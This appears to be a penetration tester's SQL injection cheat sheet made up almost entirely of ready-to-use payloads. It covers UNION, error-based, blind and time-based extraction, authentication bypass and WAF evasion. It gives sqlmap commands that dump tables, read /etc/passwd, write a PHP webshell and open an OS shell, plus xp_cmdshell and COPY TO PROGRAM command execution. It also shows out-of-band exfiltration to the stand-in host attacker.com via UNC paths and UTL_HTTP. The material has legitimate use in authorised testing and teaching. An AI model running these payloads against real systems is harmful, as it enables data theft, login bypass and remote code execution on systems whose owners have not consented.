
SQL Injection

Table of Contents


Detection

Quick Check (One-liner). Caveat: `--risk=3` enables OR-based and other heavy payloads that can modify or delete rows when the injectable query is an UPDATE/DELETE, and `--level=5` also tests every cookie and header; against a production target start with the defaults (`--risk=1 --level=1`) and raise them deliberately.

sqlmap -u "http://$rhost/page.php?id=1" --batch --risk=3 --level=5 --dbs

Basic Tests

Single quote test

'
''
`
``

Comment tests. Dialect caveats: MySQL only treats `--` as a comment when it is followed by whitespace, so append a space (or use `-- -`, which survives URL trimming); `#` is MySQL-only; `/*` opens a block comment that must be closed or run to the end of the query.

'--
'#
'/*
' OR 1=1--
' OR '1'='1
" OR 1=1--
" OR "1"="1

Arithmetic tests (for numeric parameters: if `id=2-1` returns the same page as `id=1`, the value is being evaluated by the database rather than treated as a literal)

1+1
1-1
1*1
1/1

Error-Based Detection

Force SQL errors to confirm injection (the first payload is MSSQL `CONVERT`; `extractvalue`/`updatexml` are MySQL and leak the value inside the error text — both only work when the application surfaces database errors to the client)

' AND 1=CONVERT(int, (SELECT @@version))--
' AND extractvalue(1, concat(0x7e, version()))--
' AND updatexml(1, concat(0x7e, version()), 1)--

Union-Based Injection

Column Enumeration

Find number of columns using ORDER BY

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
...
' ORDER BY N-- (until error)

Find number of columns using UNION SELECT (add NULLs until the error disappears; on Oracle the injected SELECT must also end in `FROM dual`)

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

Find string columns

' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
' UNION SELECT NULL,NULL,'a'--

Data Extraction

Extract database version

' UNION SELECT @@version,NULL,NULL--          # MySQL/MSSQL
' UNION SELECT version(),NULL,NULL--          # PostgreSQL
' UNION SELECT banner,NULL,NULL FROM v$version-- # Oracle

Extract current database

' UNION SELECT database(),NULL,NULL--         # MySQL
' UNION SELECT current_database(),NULL,NULL-- # PostgreSQL
' UNION SELECT db_name(),NULL,NULL--          # MSSQL

Extract table names (`information_schema` exists in MySQL, PostgreSQL and MSSQL; the unfiltered query also returns system tables, so filter on `table_schema` as in the second payload; Oracle has no information_schema — use `all_tables`)

' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database()--

Extract column names

' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

Extract data (CONCAT packs two values into a single displayed column; note that MySQL CONCAT returns NULL if any argument is NULL, and PostgreSQL/Oracle use `||` instead)

' UNION SELECT username,password,NULL FROM users--
' UNION SELECT CONCAT(username,':',password),NULL,NULL FROM users--

Error-Based Injection

MySQL

Extract data via error messages (the XPath error from extractvalue/updatexml is truncated to 32 characters, so page through longer values with SUBSTRING; the third payload is the `FLOOR(RAND(0)*2)` duplicate-key technique)

' AND extractvalue(1, concat(0x7e, (SELECT database())))--
' AND updatexml(1, concat(0x7e, (SELECT database())), 1)--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

MSSQL

Extract data via CONVERT error (the subquery must return exactly one row — `TOP 1` plus a `WHERE table_name NOT IN (...)` exclusion list walks the tables one at a time)

' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CONVERT(int, (SELECT @@version))--

PostgreSQL

Extract data via CAST error

' AND 1=CAST((SELECT version()) AS int)--

Blind SQL Injection

Boolean-Based

Test for true/false conditions (compare the full response — length or a specific string, not only the status code; a stable difference between the two responses is the oracle the payloads below rely on)

' AND 1=1--  (true - normal response)
' AND 1=2--  (false - different response)

Extract data character by character

' AND SUBSTRING((SELECT database()),1,1)='a'--
' AND SUBSTRING((SELECT database()),1,1)='b'--
' AND ASCII(SUBSTRING((SELECT database()),1,1))>97--

Binary search for efficiency (halve the ASCII range on each request — roughly 7 requests per character instead of up to 95 equality checks)

' AND ASCII(SUBSTRING((SELECT database()),1,1))>109--
' AND ASCII(SUBSTRING((SELECT database()),1,1))>96--
' AND ASCII(SUBSTRING((SELECT database()),1,1))=100--

Time-Based

MySQL time delay (SLEEP() is evaluated once per row the WHERE clause touches, so on a multi-row query the delay is multiplied; measure against a baseline response time and allow for network jitter)

' AND SLEEP(5)--
' AND IF(1=1, SLEEP(5), 0)--
' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)--

PostgreSQL time delay (the `;` form is a stacked query and requires the driver to allow multiple statements; the CASE form works inside a single statement)

'; SELECT pg_sleep(5)--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--

MSSQL time delay (the `;` form needs stacked queries; T-SQL batches also accept `IF ... WAITFOR` without a separator, which is what the second payload relies on)

'; WAITFOR DELAY '0:0:5'--
' IF (1=1) WAITFOR DELAY '0:0:5'--

Oracle time delay (DBMS_PIPE.RECEIVE_MESSAGE returns a number, so it can sit inside a boolean condition; it requires EXECUTE on DBMS_PIPE)

' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--

Database Specific

MySQL Queries

System information

SELECT @@version;
SELECT user();
SELECT database();
SELECT @@datadir;

List all databases

SELECT schema_name FROM information_schema.schemata;

List tables

SELECT table_name FROM information_schema.tables WHERE table_schema=database();

List columns

SELECT column_name FROM information_schema.columns WHERE table_name='users';

Read files (LOAD_FILE needs the FILE privilege, the file must be readable by the mysqld OS user, and `secure_file_priv` must be empty or include the path — otherwise it returns NULL silently)

SELECT LOAD_FILE('/etc/passwd');

Write files (INTO OUTFILE needs the FILE privilege and a path writable by mysqld inside `secure_file_priv`; it refuses to overwrite an existing file, and the webshell is only reachable if the database and web server share the host and the path is served)

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

PostgreSQL Queries

System information

SELECT version();
SELECT current_user;
SELECT current_database();

List databases

SELECT datname FROM pg_database;

List tables

SELECT tablename FROM pg_tables WHERE schemaname='public';

List columns

SELECT column_name FROM information_schema.columns WHERE table_name='users';

Read files (pg_read_file is limited to superusers or members of `pg_read_server_files`, PostgreSQL 11+; the path is on the database server)

SELECT pg_read_file('/etc/passwd');

Command execution (COPY ... TO/FROM PROGRAM requires superuser or the `pg_execute_server_program` role on PostgreSQL 11+; the command runs as the postgres OS user — the first form discards output, the table form captures it)

COPY (SELECT '') TO PROGRAM 'id';
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

MSSQL Queries

System information

SELECT @@version;
SELECT user_name();
SELECT db_name();
SELECT @@servername;

List databases

SELECT name FROM master..sysdatabases;
SELECT name FROM sys.databases;

List tables

SELECT name FROM sysobjects WHERE xtype='U';
SELECT table_name FROM information_schema.tables;

List columns

SELECT column_name FROM information_schema.columns WHERE table_name='users';

xp_cmdshell (command execution) — enabling it requires sysadmin or the ALTER SETTINGS server permission; commands run as the SQL Server service account (or its proxy account), and the sp_configure change is a persistent, audited server setting, so record it and revert it after the engagement

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

Read files (OPENROWSET BULK requires the ADMINISTER BULK OPERATIONS permission; the path is resolved on the database server)

SELECT * FROM OPENROWSET(BULK 'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS Contents;

Oracle

System information

SELECT * FROM v$version;
SELECT user FROM dual;
SELECT ora_database_name FROM dual;

List tables

SELECT table_name FROM all_tables;
SELECT table_name FROM user_tables;

List columns

SELECT column_name FROM all_tab_columns WHERE table_name='USERS';

SQLite

System information

SELECT sqlite_version();

List tables

SELECT name FROM sqlite_master WHERE type='table';

List columns

PRAGMA table_info(users);

Union-Based SQLite Injection (`sqlite_schema` is an alias introduced in SQLite 3.33 — use `sqlite_master` on older versions; `sql NOT NULL` is SQLite's postfix spelling of `IS NOT NULL`; `secrets` is an example table name)

' UNION SELECT NULL,sqlite_version()--
' UNION SELECT NULL,sql from sqlite_schema--
' UNION SELECT NULL,tbl_name from sqlite_master WHERE type='table'--
' UNION SELECT NULL,sql from sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'--
' UNION SELECT name, sql FROM sqlite_master WHERE type='table' --
' UNION SELECT name, value FROM secrets--

SQLMap

Basic Usage

Test URL parameter

sqlmap -u "http://$rhost/page.php?id=1"

Automatic detection

sqlmap -u "http://$rhost/page.php?id=1" --batch

Specify database type

sqlmap -u "http://$rhost/page.php?id=1" --dbms=mysql

Increase verbosity

sqlmap -u "http://$rhost/page.php?id=1" -v 3

POST Requests

POST data injection

sqlmap -u "http://$rhost/login.php" --data="username=admin&password=pass"

Specify parameter to test

sqlmap -u "http://$rhost/login.php" --data="username=admin&password=pass" -p username

Cookies and Headers

With cookies

sqlmap -u "http://$rhost/page.php?id=1" --cookie="PHPSESSID=abc123"

With custom headers

sqlmap -u "http://$rhost/page.php?id=1" -H "X-Forwarded-For: 127.0.0.1"

From Burp request file

sqlmap -r request.txt

Database Enumeration

Get current database

sqlmap -u "http://$rhost/page.php?id=1" --current-db

List all databases

sqlmap -u "http://$rhost/page.php?id=1" --dbs

List tables in database

sqlmap -u "http://$rhost/page.php?id=1" -D database_name --tables

List columns in table

sqlmap -u "http://$rhost/page.php?id=1" -D database_name -T users --columns

Dump data

sqlmap -u "http://$rhost/page.php?id=1" -D database_name -T users --dump

Dump specific columns

sqlmap -u "http://$rhost/page.php?id=1" -D database_name -T users -C username,password --dump

Dump all

sqlmap -u "http://$rhost/page.php?id=1" --dump-all

File Operations

Read file

sqlmap -u "http://$rhost/page.php?id=1" --file-read="/etc/passwd"

Write file

sqlmap -u "http://$rhost/page.php?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

OS Shell

Get OS shell

sqlmap -u "http://$rhost/page.php?id=1" --os-shell

Get SQL shell

sqlmap -u "http://$rhost/page.php?id=1" --sql-shell

Execute OS command

sqlmap -u "http://$rhost/page.php?id=1" --os-cmd="whoami"

Tamper Scripts

List tamper scripts

sqlmap --list-tampers

Use tamper scripts (WAF bypass) — each tamper rewrites the payload before sending; combine only scripts that target the same filter, and confirm with `-v 3` that the transformed request still reaches the database

sqlmap -u "http://$rhost/page.php?id=1" --tamper=space2comment
sqlmap -u "http://$rhost/page.php?id=1" --tamper=between,randomcase
sqlmap -u "http://$rhost/page.php?id=1" --tamper=charencode

Common tamper combinations (note: `base64encode` only works when the application base64-decodes the parameter before using it — it is not a general-purpose bypass)

# MySQL
sqlmap -u "http://$rhost/page.php?id=1" --tamper=space2comment,between,randomcase

# MSSQL
sqlmap -u "http://$rhost/page.php?id=1" --tamper=space2mssqlblank,between

# General WAF bypass
sqlmap -u "http://$rhost/page.php?id=1" --tamper=apostrophemask,apostrophenullencode,base64encode

Authentication Bypass

Common login bypass payloads

admin'--
admin'#
admin'/*
' OR 1=1--
' OR 1=1#
' OR '1'='1
' OR '1'='1'--
" OR 1=1--
" OR "1"="1
admin' OR '1'='1
admin" OR "1"="1
') OR ('1'='1
') OR '1'='1'--

MD5 hash comparison bypass (works when the application hashes the submitted password and compares it with the password column returned by the query: the injected UNION row supplies a known hash — here MD5 of `1234` — so the column count and order must match the real users row)

' UNION SELECT 1,'admin','81dc9bdb52d04dc20036dbd8313ed055'-- (password: 1234)

WAF Bypass

Space Bypass

/**/
+
%20
%09
%0a
%0b
%0c
%0d

Examples

UNION/**/SELECT/**/1,2,3
UNION+SELECT+1,2,3

Comment Bypass (the `/*! ... */` versioned-comment form is MySQL-specific; other engines treat it as an ordinary comment and drop the keywords)

/*!UNION*/ /*!SELECT*/ 1,2,3

Case Variation

UnIoN SeLeCt 1,2,3
uNiOn sElEcT 1,2,3

Encoding

# URL encoding
%55%4e%49%4f%4e%20%53%45%4c%45%43%54

# Double URL encoding
%2555%254e%2549%254f%254e

Null Byte (relies on a filter or C-based layer stopping at the null byte while the database driver receives the rest; rarely effective on modern stacks)

%00' UNION SELECT 1,2,3--

Second-Order SQLi

Inject payload that gets stored and executed later (the value is written safely on insert but later concatenated into a different query, where the `--` comments out the original closing quote; choose a stored value that is harmless if the second query turns out not to be vulnerable)

# During registration (stored)
Username: admin'--

# During password reset (executed)
UPDATE users SET password='newpass' WHERE username='admin'--'

Out-of-Band (OOB)

DNS Exfiltration (each DNS label is limited to 63 characters and the full name to 253, so hex-encode and chunk the data; the database host must be able to resolve external names)

MySQL (the UNC-path trick only works on a Windows MySQL host with the FILE privilege and outbound SMB/DNS allowed)

SELECT LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'));

MSSQL (xp_dirtree/xp_subdirs trigger a UNC lookup from the SQL Server service account; the DNS query leaks even when SMB is blocked outbound)

EXEC master..xp_dirtree '\\attacker.com\a';
EXEC master..xp_subdirs '\\attacker.com\a';

Oracle (UTL_HTTP and HTTPURITYPE need a network ACL grant to the current user on 11g and later; the request also leaks the result in the URL path)

SELECT UTL_HTTP.REQUEST('http://attacker.com/'||user) FROM dual;
SELECT HTTPURITYPE('http://attacker.com/'||user).getclob() FROM dual;

See Also